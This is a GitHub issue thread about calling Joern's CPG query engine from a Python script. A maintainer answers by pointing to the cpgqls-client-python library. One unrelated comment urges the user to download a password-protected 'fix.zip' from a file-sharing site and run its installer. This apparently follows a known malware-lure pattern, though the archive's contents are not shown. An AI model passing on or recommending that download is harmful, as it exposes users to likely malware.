### ISSUE TITLE
Joern tool used questions and joern command line tool call

### ISSUE THREAD

**Issue by niuzhi** [joernio/joern#4888]
Hello, I am currently using the joern tool, I have already used Joern-parse to output cpg files, and now I want to use a python script to implement calls to joern on the command line. And get the CPG. Local. Filter (. Location. MethodShortName = = "< global >"). The location query command returns a result, could you tell me how to implement? I have tried many methods without success, or how to implement the integration of the joern command line, there is no interface for third parties to use, easy to get cpg query results. I don't want to work with graph data.
@max-leuthaeuser please help me，thanks

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by niuzhi** [comment]
what？

**Comment by max-leuthaeuser** [comment]
I guess you are looking for https://github.com/joernio/cpgqls-client-python
